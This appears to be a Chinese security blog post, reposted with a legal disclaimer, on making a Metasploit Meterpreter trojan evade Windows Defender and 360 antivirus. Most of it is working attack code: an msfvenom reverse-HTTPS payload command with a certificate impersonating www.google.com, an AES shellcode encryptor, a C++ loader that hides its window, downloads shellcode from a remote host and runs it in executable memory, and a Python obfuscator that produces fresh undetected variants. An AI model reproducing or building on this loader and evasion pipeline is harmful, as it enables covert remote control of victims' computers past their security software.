Metasploit 简单木马免杀

admin
admin
admin
145127
文章
119
评论
2025年6月24日20:36:10评论11 views字数 21017阅读70分3秒阅读模式
好久没写公众号,游戏打腻了,闲来无事,因为看牛马们都进京去打护W了,然后想起了免杀,以前也玩过,但是不够系统的玩,从几年前开始业界的常规木马免杀都是shellcode和加载器分离了,这个思路很不错,那会就可以过很多的杀软了,毕竟加载器实际上就是个下载工具,里面不包含恶意代码,下载的要是恶意代码,那才是病毒或者木马程序。
可惜动态高风险操作还是会被杀软抓到报毒,还有声明下,今天是2025.6.24,以下操作截止今日是有效的。
工具与环境
  1. windows11、本机、 Windows Defender最新 
  2. windows10、虚拟机、 360最新
  3. ubuntu24、控制端vps、 Metasploit最新
  4. python3

  5. Visual Studio 2022 c++开发环境(x86)

  6. upx可执行文件压缩工具(加壳)

Visual Studio需要稍微改下:

Metasploit 简单木马免杀
Metasploit 简单木马免杀

免杀理论

未知攻焉知防,同理,不知道杀软是如何防御,木马如何bypass? 杀软杀木马分为静态查杀和动态查杀,静态查杀实际上就是程序特征、pe结构之类,动态查杀,现在玩法很高端,什么沙盒里执行、异常恶意行为监测、流量监测等,我比较菜很难绕过动态,所以侧重静态,规避程序恶意特征,方式如下:

  1. 加载器与shellcode分离

  2. shellcode加密

  3. c++代码随机混淆

  4. 木马传输流量加密

首先要ubuntu的msf生成一个shellcode,但是出于木马流量加密考虑得https证书加持。

生成证书:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" -keyout www.google.com.key -out www.google.com.crt && cat www.google.com.key www.google.com.crt > www.google.com.pem && rm -f www.google.com.key www.google.com.crt

生成shellcode恶意二进制bin文件

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_winhttps LHOST=1.1.1.1 LPORT=11112 PayloadUUIDTracking=true HandlerSSLCert=/xxx/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f raw -o shellcode.bin
虽然很不满意这种流量加密方式,但是没办法,msf框架目前据我各种学习资料,就https这个稍微靠谱点,rc4也是服,跟没加密一样,这部分要是也可以指定自己的加密方式就好了。
这种方式生成出来的shellcode很明显就是个木马bin文件,很容易被杀软杀掉,所以用py脚本写了个shellcode文件 aes256加密脚本。
# encrypt_shellcode.py# pip install pycryptodomefrom Crypto.Cipher import AESimport base64import osos.system("msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_winhttps LHOST=1.1.1.1 LPORT=11112 PayloadUUIDTracking=true HandlerSSLCert=/xxx/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f raw -o shellcode.bin")KEY = b'0123456789abcdef0123456789abcdef'  # 32字节 key (AES-256)IV  = b'a234567890abcd12'                  # 16字节 iv (CBC 模式)def pad(data):    pad_len = 16 - (len(data) % 16)    return data + bytes([pad_len] * pad_len)with open('shellcode.bin''rb'as f:    raw = f.read()cipher = AES.new(KEY, AES.MODE_CBC, IV)encrypted = cipher.encrypt(pad(raw))with open('sc1.txt''wb'as f:    f.write(encrypted)print("[+] 加密完成,保存为 sc1.bin,放到 Web 目录")
把shellcode加密后放sc1.txt里,放在vps的web目录,便于之后加载器程序加载。
Metasploit 简单木马免杀
cpp加载器代码:
#include<windows.h>#include<wininet.h>#include<bcrypt.h>#include<iostream>#include<vector>#pragma comment(lib, "wininet.lib")#pragma comment(lib, "bcrypt.lib")// 下载文件std::vector<BYTE> http_download(constchar* url){    HINTERNET hInternet = InternetOpenA("Loader", INTERNET_OPEN_TYPE_PRECONFIG, NULLNULL0);    HINTERNET hFile = InternetOpenUrlA(hInternet, url, NULL0, INTERNET_FLAG_RELOAD, 0);    std::vector<BYTE> buffer;    BYTE temp[1024];    DWORD bytesRead = 0;    while (InternetReadFile(hFile, temp, sizeof(temp), &bytesRead) && bytesRead != 0) {        buffer.insert(buffer.end(), temp, temp + bytesRead);    }    InternetCloseHandle(hFile);    InternetCloseHandle(hInternet);    return buffer;}// 解密 AES-256-CBCstd::vector<BYTE> aes_decrypt(const std::vector<BYTE>& data, const BYTE* key, const BYTE* iv){    BCRYPT_ALG_HANDLE hAlg = NULL;    BCRYPT_KEY_HANDLE hKey = NULL;    DWORD cbKeyObject, cbData, cbBlockLen;    std::vector<BYTE> decrypted(data.size());    BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL0);    BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&cbKeyObject, sizeof(DWORD), &cbData, 0);    BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PUCHAR)&cbBlockLen, sizeof(DWORD), &cbData, 0);    std::vector<BYTE> keyObject(cbKeyObject);    BCryptGenerateSymmetricKey(hAlg, &hKey, keyObject.data(), cbKeyObject, (PUCHAR)key, 320);    std::vector<BYTE> ivCopy(iv, iv + 16);    ULONG resultLen = 0;    BCryptDecrypt(hKey, (PUCHAR)data.data(), (ULONG)data.size(),        NULL, ivCopy.data(), cbBlockLen,        decrypted.data(), (ULONG)decrypted.size(), &resultLen, 0);    decrypted.resize(resultLen);    BCryptDestroyKey(hKey);    BCryptCloseAlgorithmProvider(hAlg, 0);    return decrypted;}// AES KEY 和 IVconst BYTE key[32] = {    '0','1','2','3','4','5','6','7','8','9',    'a','b','c','d','e','f',    '0','1','2','3','4','5','6','7','8','9',    'a','b','c','d','e','f'};const BYTE iv[16] = {    'a','2','3','4','5','6','7','8',    '9','0','a','b','c','d','1','2'};intmain(){    voidunusedPrimeCheck();    HWND hwnd = GetConsoleWindow();    ShowWindow(hwnd, SW_HIDE);  // 隐藏窗口    const char* url = "http://1.1.1.1/sc1.txt?12asss2ss1sss2ssss3"// 你的远程 sc 路径    std::vector<BYTE> encrypted = http_download(url);    if (encrypted.empty()) {        std::cerr << "[-] fail" << std::endl;        return -1;    }    std::cerr << "[-] etsttest" << std::endl;    voidfakeMemoryShuffle();    std::vector<BYTE> sc12 = aes_decrypt(encrypted, key, iv);    void* exec = VirtualAlloc(NULL, sc12.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    memcpy(exec, sc12.data(), sc12.size());    std::cout << "[+] loading.." << std::endl;    ((void(*)())exec)();    return 0;}
http://1.1.1.1/sc1.txt?12asss2ss1sss2ssss3
这个就是shellcode地址,这段c++代码就是个简单shellcode加载器,从远端sc1.txt下载回来,解密后加载到内存执行,虽然才开始也可以免杀,但是一旦这玩意运行你使用高风险操作就会被报毒,然后这段代码就废了,这点很被动。
所以需要一个c++代码的随机加密和混淆工具,才开始我找了很多c++混淆方式,但是效果都不是太好,或者有的混淆工具太麻烦了,没办法自己动手丰衣足食,就用py写了个c++混淆脚本,用来简单的混淆c++代码,最后upx压缩下,效果出奇的不错,就算运行高风险操作后,exe文件被杀了,pe结构被杀软知道了,还可以通过py代码重新生成一个c++代码,编译后生成exe,又是一个全新的exe文件。
py脚本随机混淆c++代码:
#encoding: utf-8import re,random,stringdef random_string_variable_length(min_len=5, max_len=15):        length = random.randint(min_len, max_len)    first_char = random.choice(string.ascii_letters)  # 首字符必须是字母    rest_chars = random.choices(string.ascii_letters + string.digits, k=length - 1)    return first_char + ''.join(rest_chars)def generate_cpp_string_set():    count = random.randint(15500)    strings = [f'"{random_string_variable_length()}"' for _ in range(count)]    return '{ ' + ', '.join(strings) + ' }'dowload_fun_name = random_string_variable_length()decrypt_fun_name = random_string_variable_length()key_name = random_string_variable_length()iv_name = random_string_variable_length()url_name = random_string_variable_length()fun_url_name = random_string_variable_length()random_fun_name= random_string_variable_length()shellcode_name = random_string_variable_length()exec_name = random_string_variable_length()string_name= random_string_variable_length(min_len=10,max_len=150)#print(dowload_fun_name)list_fun_code=['''void {random_fun_name}() {    for (int i = 2; i < 100; ++i) {        isPrime(i);  // 故意不保存结果    }}''','''void {random_fun_name}() {    char buf1[32] = { 0 };    char buf2[32] = { 0 };    for (int i = 0; i < 32; ++i) {        buf1[i] = (char)(i * 3);        buf2[i] = buf1[31 - i];    }}''','''void {random_fun_name}() {    for (int i = 0; i < 5; ++i) {        if (i % 2 == 0) {            Sleep(123 + i * 2);        }        else {            Sleep(100 - i);        }    }}'''               ]cpp_code="""#include <windows.h>#include <wininet.h>#include <bcrypt.h>#include <fstream>#include <iostream>#include <vector>#pragma comment(lib, "wininet.lib")#pragma comment(lib, "bcrypt.lib")void {random_fun_name}() {    for (int i = 0; i < 5; ++i) {        if (i % 2 == 0) {            Sleep(123 + i * 2);        }        else {            Sleep(100 - i);        }    }}std::vector<BYTE> {dowload_fun_name}(const char* {fun_url_name}) {    HINTERNET hInternet = InternetOpenA("Loader", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);    HINTERNET hFile = InternetOpenUrlA(hInternet, {fun_url_name}, NULL, 0, INTERNET_FLAG_RELOAD, 0);    std::vector<BYTE> buffer;    BYTE temp[1024];    DWORD bytesRead = 0;    while (InternetReadFile(hFile, temp, sizeof(temp), &bytesRead) && bytesRead != 0) {        buffer.insert(buffer.end(), temp, temp + bytesRead);    }    InternetCloseHandle(hFile);    InternetCloseHandle(hInternet);    return buffer;}std::vector<BYTE> {decrypt_fun_name}(const std::vector<BYTE>& data, const BYTE* key, const BYTE* iv) {    BCRYPT_ALG_HANDLE hAlg = NULL;    BCRYPT_KEY_HANDLE hKey = NULL;    DWORD cbKeyObject, cbData, cbBlockLen;    std::vector<BYTE> decrypted(data.size());    BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);    BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&cbKeyObject, sizeof(DWORD), &cbData, 0);    BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PUCHAR)&cbBlockLen, sizeof(DWORD), &cbData, 0);    std::vector<BYTE> keyObject(cbKeyObject);    BCryptGenerateSymmetricKey(hAlg, &hKey, keyObject.data(), cbKeyObject, (PUCHAR)key, 32, 0);    std::vector<BYTE> ivCopy(iv, iv + 16);    ULONG resultLen = 0;    BCryptDecrypt(hKey, (PUCHAR)data.data(), (ULONG)data.size(),        NULL, ivCopy.data(), cbBlockLen,        decrypted.data(), (ULONG)decrypted.size(), &resultLen, 0);    decrypted.resize(resultLen);    BCryptDestroyKey(hKey);    BCryptCloseAlgorithmProvider(hAlg, 0);    return decrypted;}bool DownloadFile(const char* url, const char* localFile) {    HINTERNET hInternet = InternetOpenA("MyDownloader", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);    if (!hInternet) {        std::cerr << "InternetOpenA failed";        return false;    }    HINTERNET hUrl = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_RELOAD, 0);    if (!hUrl) {        std::cerr << "InternetOpenUrlA failed";        InternetCloseHandle(hInternet);        return false;    }    std::ofstream out(localFile, std::ios::binary);    if (!out) {        std::cerr << "Failed to open output file";        InternetCloseHandle(hUrl);        InternetCloseHandle(hInternet);        return false;    }    char buffer[4096];    DWORD bytesRead;    while (InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {        out.write(buffer, bytesRead);    }    out.close();    InternetCloseHandle(hUrl);    InternetCloseHandle(hInternet);    return true;}const BYTE {key_name}[32] = {    '0','1','2','3','4','5','6','7','8','9',    'a','b','c','d','e','f',    '0','1','2','3','4','5','6','7','8','9',    'a','b','c','d','e','f'};const BYTE {iv_name}[16] = {    'a','2','3','4','5','6','7','8',    '9','0','a','b','c','d','1','2'};int main() {    const char* imageUrl = "https://upload.xxx.org/wikipedia/commons/4/47/PNG_transp{random_stringa}arency_demonstration_1.png";    const char* outputFile = "downloaded_image.png";    if(DownloadFile(imageUrl, outputFile)) {        std::cout << "[+] Image downloaded successfully: " << outputFile << std::endl;    }    else {        std::cerr << "[-] Failed to download image." << std::endl;    }    void {random_fun_name}();  // 调用随机函数以增加复杂度    void unusedPrimeCheck();    HWND hwnd = GetConsoleWindow();    ShowWindow(hwnd, SW_HIDE);      const char* {url_name} = "http://1.1.1.1/sc1.txt?12as{random_stringa}"    std::vector<BYTE> encrypted = {dowload_fun_name}({url_name});    if(encrypted.empty()) {        std::cerr << "[-] {string_name}" << std::endl;        return -1;    }    void {random_fun_name}();  // 调用随机函数以增加复杂度    std::cout << "[+] {string_name}.." << std::endl;    std::cerr << "[-] {string_name}" << std::endl;    void fakeMemoryShuffle();    std::vector<BYTE> {shellcode_name} = {decrypt_fun_name}(encrypted, {key_name}, {iv_name});    void* {exec_name} = VirtualAlloc(NULL, {shellcode_name}.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    memcpy({exec_name}, {shellcode_name}.data(), {shellcode_name}.size());    std::cout << "[+] {string_name}.." << std::endl;    std::vector<std::string> {for_names} = {dict_names};    for(const std::string& {for_name} : {for_names}) {        std::cout << {for_name} << std::endl;    }    ((void(*)()){exec_name})();    return 0;}"""cpp_code=cpp_code.replace('{dowload_fun_name}',dowload_fun_name)cpp_code=cpp_code.replace('{decrypt_fun_name}',decrypt_fun_name)cpp_code=cpp_code.replace('{shellcode_name}',shellcode_name)cpp_code=cpp_code.replace('{key_name}',key_name)cpp_code=cpp_code.replace('{iv_name}',iv_name)cpp_code=cpp_code.replace('{string_name}',string_name)cpp_code=cpp_code.replace('{url_name}',url_name)cpp_code=cpp_code.replace('{random_stringa}',random_string_variable_length(min_len=6,max_len=20))cpp_code=cpp_code.replace('{exec_name}',exec_name)cpp_code=cpp_code.replace('{fun_url_name}',fun_url_name)cpp_code=cpp_code.replace('{random_fun_name}',random_fun_name)cpp_code=cpp_code.replace('{for_name}',random_string_variable_length())cpp_code=cpp_code.replace('{for_names}',random_string_variable_length())cpp_code=cpp_code.replace('{dict_names}',generate_cpp_string_set())print(cpp_code)#print(generate_cpp_string_set())
Metasploit 简单木马免杀
Metasploit 简单木马免杀
如图,被混淆了很多变量名、函数名之类。
混淆后的c++代码:
Metasploit 简单木马免杀
#include<windows.h>#include<wininet.h>#include<bcrypt.h>#include<fstream>#include<iostream>#include<vector>#pragma comment(lib, "wininet.lib")#pragma comment(lib, "bcrypt.lib")voidMF59F3AarmM9Ubz(){    for (int i = 0; i < 5; ++i) {        if (i % 2 == 0) {            Sleep(123 + i * 2);        }        else {            Sleep(100 - i);        }    }}std::vector<BYTE> vb5RxBAR(constchar* bQ8k3JpQujJX9Q){    HINTERNET hInternet = InternetOpenA("Loader", INTERNET_OPEN_TYPE_PRECONFIG, NULLNULL0);    HINTERNET hFile = InternetOpenUrlA(hInternet, bQ8k3JpQujJX9Q, NULL0, INTERNET_FLAG_RELOAD, 0);    std::vector<BYTE> buffer;    BYTE temp[1024];    DWORD bytesRead = 0;    while (InternetReadFile(hFile, temp, sizeof(temp), &bytesRead) && bytesRead != 0) {        buffer.insert(buffer.end(), temp, temp + bytesRead);    }    InternetCloseHandle(hFile);    InternetCloseHandle(hInternet);    return buffer;}std::vector<BYTE> r5nCo(const std::vector<BYTE>& data, const BYTE* key, const BYTE* iv){    BCRYPT_ALG_HANDLE hAlg = NULL;    BCRYPT_KEY_HANDLE hKey = NULL;    DWORD cbKeyObject, cbData, cbBlockLen;    std::vector<BYTE> decrypted(data.size());    BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL0);    BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PUCHAR)&cbKeyObject, sizeof(DWORD), &cbData, 0);    BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PUCHAR)&cbBlockLen, sizeof(DWORD), &cbData, 0);    std::vector<BYTE> keyObject(cbKeyObject);    BCryptGenerateSymmetricKey(hAlg, &hKey, keyObject.data(), cbKeyObject, (PUCHAR)key, 320);    std::vector<BYTE> ivCopy(iv, iv + 16);    ULONG resultLen = 0;    BCryptDecrypt(hKey, (PUCHAR)data.data(), (ULONG)data.size(),        NULL, ivCopy.data(), cbBlockLen,        decrypted.data(), (ULONG)decrypted.size(), &resultLen, 0);    decrypted.resize(resultLen);    BCryptDestroyKey(hKey);    BCryptCloseAlgorithmProvider(hAlg, 0);    return decrypted;}boolDownloadFile(constchar* url, constchar* localFile){    HINTERNET hInternet = InternetOpenA("MyDownloader", INTERNET_OPEN_TYPE_DIRECT, NULLNULL0);    if (!hInternet) {        std::cerr << "InternetOpenA failed";        return false;    }    HINTERNET hUrl = InternetOpenUrlA(hInternet, url, NULL0, INTERNET_FLAG_RELOAD, 0);    if (!hUrl) {        std::cerr << "InternetOpenUrlA failed";        InternetCloseHandle(hInternet);        return false;    }    std::ofstream out(localFile, std::ios::binary);    if (!out) {        std::cerr << "Failed to open output file";        InternetCloseHandle(hUrl);        InternetCloseHandle(hInternet);        return false;    }    char buffer[4096];    DWORD bytesRead;    while (InternetReadFile(hUrl, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) {        out.write(buffer, bytesRead);    }    out.close();    InternetCloseHandle(hUrl);    InternetCloseHandle(hInternet);    return true;}const BYTE gBTukrt[32] = {    '0','1','2','3','4','5','6','7','8','9',    'a','b','c','d','e','f',    '0','1','2','3','4','5','6','7','8','9',    'a','b','c','d','e','f'};const BYTE Q1voA[16] = {    'a','2','3','4','5','6','7','8',    '9','0','a','b','c','d','1','2'};intmain(){    const char* imageUrl = "https://upload.xxx.org/wikipedia/commons/4/47/PNG_transpKPZqu7AcUarency_demonstration_1.png";    const char* outputFile = "downloaded_image.png";    if (DownloadFile(imageUrl, outputFile)) {        std::cout << "[+] Image downloaded successfully: " << outputFile << std::endl;    }    else {        std::cerr << "[-] Failed to download image." << std::endl;    }    voidMF59F3AarmM9Ubz();  // 调用随机函数以增加复杂度    voidunusedPrimeCheck();    HWND hwnd = GetConsoleWindow();    ShowWindow(hwnd, SW_HIDE);    const char* pboKdjpS0T = "http://1.1.1.1/sc1.txt?KPZqu7AcU";    std::vector<BYTE> encrypted = vb5RxBAR(pboKdjpS0T);    if (encrypted.empty()) {        std::cerr << "[-] xFZinAbdMyMvYRDxzPaLletnS3IgEvIHvxib8Z7svprMPs0iVCx6IjvY2SpKCJjJD2lVOp0MCB6nIq33WbraoOIdfFfMMfB2lmvKDEM7kjvSm58NhSl83u3UZ3tbIWPO2mMAoeUiNkPSGuUSg" << std::endl;        return -1;    }    voidMF59F3AarmM9Ubz();  // 调用随机函数以增加复杂度    std::cout << "[+] xFZinAbdMyMvYRDxzPaLletnS3IgEvIHvxib8Z7svprMPs0iVCx6IjvY2SpKCJjJD2lVOp0MCB6nIq33WbraoOIdfFfMMfB2lmvKDEM7kjvSm58NhSl83u3UZ3tbIWPO2mMAoeUiNkPSGuUSg.." << std::endl;    std::cerr << "[-] xFZinAbdMyMvYRDxzPaLletnS3IgEvIHvxib8Z7svprMPs0iVCx6IjvY2SpKCJjJD2lVOp0MCB6nIq33WbraoOIdfFfMMfB2lmvKDEM7kjvSm58NhSl83u3UZ3tbIWPO2mMAoeUiNkPSGuUSg" << std::endl;    voidfakeMemoryShuffle();    std::vector<BYTE> gC7XuGj = r5nCo(encrypted, gBTukrt, Q1voA);    void* CUbuNT = VirtualAlloc(NULL, gC7XuGj.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    memcpy(CUbuNT, gC7XuGj.data(), gC7XuGj.size());    std::cout << "[+] xFZinAbdMyMvYRDxzPaLletnS3IgEvIHvxib8Z7svprMPs0iVCx6IjvY2SpKCJjJD2lVOp0MCB6nIq33WbraoOIdfFfMMfB2lmvKDEM7kjvSm58NhSl83u3UZ3tbIWPO2mMAoeUiNkPSGuUSg.." << std::endl;    std::vector<std::string> Ocr4QxIOyTZ0 = { "MV8MhIL""I1gIkXKjIR606""vl18lFxZMIfFlBM""HuSDyl""r3xPqM8WPrB2dK""LpbYsCG1nnsiif2""c2smL4yu2k""nw2Nx92EudvF3""RKyAhdfmwbVO""oRQ7d8mYUADg1d""UR0wUyaLm""ypu0U3i7xwajzEK""oAPan""dOlzOzI""UXrlv""CBGwHqG""zgQP2FlN02w6C9u""fGqSL""KpVLWhVSd""ClOJcCsfgluv336""M4PM3""xJLLB2w""nCTy5kk5""Ux3sNipbOH""RlOMwc""ETIsv34zWQ6""oW2LJf""ZpBtatQy""nT13C""i9LRHTu""RlOF5k5zS9PYP""xiJRiAFbEgV""Wn5g48S46""WemPFaPk1""IZ4VkMzZlXz""F9JlaBBgRrQ56""HPRlMySEM""PDxz1E7I7wufZW""U4R8pcFKJJhU""fnsffWLAk1TqZ""ChuVzZA94d1i""bzYLk""A5dMzdiLiSveAIc""J3wXbqMm""FZ9DAuy9fHQkfR""S0i4taJSjs6""A08Gx""Sw9vVhomh""QSS027yL""Jw4qCySgD""Zx0Z28""K3ZpecM""vYZC6nqXq6aq""KCzyM""wA6AHXVsSwWDpV""zfrbGPdf""nBiiQLzwLG4P55F""MO6KbzD7ML""ykhXKCnADxQDO0s""EenVdCdZt1""oTgN2k""z1R6mljmAy7H9h""dwxhAwYQX""ZG5ZwCai9""XounDJ7""s6k6CdFa3JYcMY""Y3DZxUI""D504HJMOGKjoaK""unVRdXEvUT""YMTL8sTQm6OvxC""Iqqoja""OfrLmUm""cN9SsG""lQ5TOw76""Led02JL66aj""AMMW1""UuEdQU5hHRY""BBpfhcLWuDdgNGK""Wv32hznAQg""yX6Bhs8ETmYan""ryKCzhY8dg4M9r""YCxZEJPv""UdV41DnmyYdfRSS""blgo8Y""iTe9gpupV8V""RvBGwBT""NBbz0U""L9qiB9CK4f""TAs13s1z0HVC""jknjCVcnK""sPGUc2MqDu""tGAcF3UFE4i5k""GPh5z""RkpEpS4Lemr""MyoJ5RaITzKgKx""ZCy46UjEoN34""T6Nns""X87x8PjouvRWX""bGcwZqnM""Sgek5Nj7Pa""fQXdj6Ons4h""v2guORne7""Nz1DUSvXZ""D6Pbx9NUvseuZf""D8mciUo""y3OC05SERg""bpxbqx""xZ2aw""gIKi3xWX08""POQldYB853OFgA""nZ2Su""MBVMYBwyB""KxZmLNxdhmq2lT""sppXaD""RdNmxl7ZvKi7hB""xA98Blc18""WiSd4jOs""RhL7fcNg""fr5YvrLRy6A0tK""Zc0AqHtYHtSi6C""uy9EzchNn""ijEpWimy""GQIID""YmGmQ9""kzqKBVDO4fd""gX6poRHQfX8""RdiJ4GBoyuCr""cmzt2ZVt""Apn4fDUPiX""SAoVBqbZfp01""ByWs5rR9rj3""UHnNAoF""VlRLTo0C44ou6x1""FlCdOVS0WU""lgAmV97dZx9e""kf3AzXsP""Q1g4mYxp35DMM""zHc0WuM4rlpH""YBtQd""YP3rUGARo0GvN""H0g7eCrawIooSd""YZe6hEo894gRC""lBVnDhrv""g4Z6r""aYAts8fbDZWhibf""vzDo8""Fo5T2""pPcJUh1""QPCOHGCYgcgL""nrHqvaB4jG""k4CwoiiOkE0fNhs""ONJuEf""axZh4g1si5E""L5GJi""fyyaqWZ""Y73OMN""ztRZKPOHExmS""AgZqHRmKgJZu""a940sOFgKhryQq""HMt581""qQpkMmUAjQQDj""NbhfWgaDGGCHMWh""viMtzvikc6nYM""rWkt8""SwCks""qNT8l8xfTvu1s9""R3U4euMBamIyc""mJfltWyf""liNVxOqYh700P""Vr4sPj7t""bsD5VkT2U""BT8xe5lv9pk""CRmefA0uKwiS""oJVDK""XElMHWs8""NX0G5J6ZwR""W92go""KLzIYi97W""sNXsOXWHVxud""D6PpzNcSIDY""bVqoc1Pp5A""unrF6fEMCa""AMjMWWnUj0DsSXP""HX3sdK4kL0jqCkp""rmqKFvIPUZQG""OEqlROEnI4R""ZBvBGDPSLF""EUhE5Pto""yXY5ww5Pjd""iTzNdfu""tko1oxKWTFYM7Kg""uCdyc2KT1AFkOq""iQtCjxYCX""UkXUGeVf2""DVGjewf1""ahK2HQqZpwt""kTSlYbPDjt0AatS""AAUXHRWVIPuu6eA""WMXeIIqgNahz5I""ah6xen9LOu""Ykmx2b""wGfum3""C67G74T""Od1opn2onC""TIAs7Bp2""dbwnS""el4Ks7JraG""dBkuK5K1lsE""snAPf""jGIte2Cg9yL""MrmfTvlnOkGSYHp""RnlfhwOYX1zcD""RRnMoJBdw4u481""Ze61nmcW""eQSU8OD""iMczmCr3kH81Y9O""kSN2U5hjf2VwgR""xrDK1ci8g9""kFzrZf""Bp33V7h""P9ooJd6KLuWrh""YzbACQMlY9ii""NG6I1iI31q""mZRKQ2oxcuG""ofSqejB56WI""Psamp5ahZBN""PrUL9JCrTyfY""PAWmQiEb""Qut2HL3IBra8y""s6poywOUTHb5""X6rprW58riTWdgY""U8qPWV9""tBCwnjQPE""qNtoTqpA9CwlS8""P6m17ONn""wYuSi3NV2gg""obXFKiL6SgkDF""xhlRmVu""jswAtipWdi""M5NWtWriogY""fak5URu""oSv1q04jYrHt9""mkATMi""Eql3bgiXSR""RbYinP1u""i3sLKKYrhzj""LVkSqZbTctLu9s""IxjzcjQ6COFVNNo""lIIEbIvkgTPn""EzeTLEPP07e""UHyTliyEEC9sO""y1zC7xCFDeDG""PNtTG8kaaUs1""HVZwkzSBtv""uHCUQ1wtj7TJE""CuGgZM6l6""jVe0rsgI""qTCOuepJ8""uqCWZ54NBqp""bast8uSJTHU2Pj""UKcb9J9ZWZ8Dw""PoR0SC4""va0TB6gSUIBTC""Jh47PFnTtNcF""ZEqV506O2LfKPi""mNWXDCLZPIjXe""P1TRKsxjt06TSJS""n9uSW""HWyjfml7lhz8i""MVvs0Kq2k""RD18C""Qty07uCFqNF""Yzee8lpbHlLen""pfjjWeBtzjZ""p349hNu""gRVDMttlyR""sOpsWopi""wZbNchekCF""b5VxFDg4""K2rUCfDOHPfnC""RLhqKz7vaPhlmbS""oD70BO""SzM7I5r""OKIPc1pQOqCN""WaZrv9OGE43P""LJNcsQY2tK2qp""nn4dFoRfQq""ZxOrRI0""CL3COzoB7""ZRcPpGs""E6LDi4Z""OiSSZP7""bLB2H""qchjxrWFYax""wvcjMUizagqkL""MWgHKyfAk""d0o6Ysqb""g8SNM9""fIzwn4TuDWktzIH""eSmirEB2Ay0wM""mnv4fZ8Uyq2HW""ImAeni1vguzjxJ""TSVK8ZO""qw010vXhadqDear""NEXqdK033tfj""cVynyKzqV""yF769WC""wKvjAfcSg6Lcmm""U6R5w1TA6CK""QuupdvD6WvPc""TOJQ0e6DqAMiW""ZLzQBKz4J""FOdqTZaIsU""JeTdru6abC19V""tgt3c""TKhrX1l23V""IYxVG2gAWR2RSzh""EkOoIRNoUf30rOZ""Bb4QrSw""oJ21zX1b""GOqIap5FfCn0""xzAN4tvK4KzcJn" };    for (const std::string& JCmYhnv78QIO0RI : Ocr4QxIOyTZ0) {        std::cout << JCmYhnv78QIO0RI << std::endl;    }    ((void(*)())CUbuNT)();    return 0;}
实际上就是把变量名、函数名、字符名、变成随机字符,再随便问gpt要点c++示例代码各种循环之类,加进去改变之前的代码结构,编译运行就可以免杀了。
运行效果,在360、Defender在静态,和动态执行些简单的命令、ls、cat、getuid、sysinfo、截屏、这些不是很高风险命令情况下,大概放那半个小时,没被查杀,而且反正被杀了,我重新运行py脚本生成一个就完事。
Metasploit 简单木马免杀
Metasploit 简单木马免杀
Metasploit 简单木马免杀
我这种临时解决方案略显轻浮,但我又不想学Windows pwn安全,很羡慕那种巨稳定的想干嘛就干嘛,无视杀软的木马...

原文始发于微信公众号(鬼麦子):Metasploit 简单木马免杀

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月24日20:36:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit 简单木马免杀https://cn-sec.com/archives/4198289.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息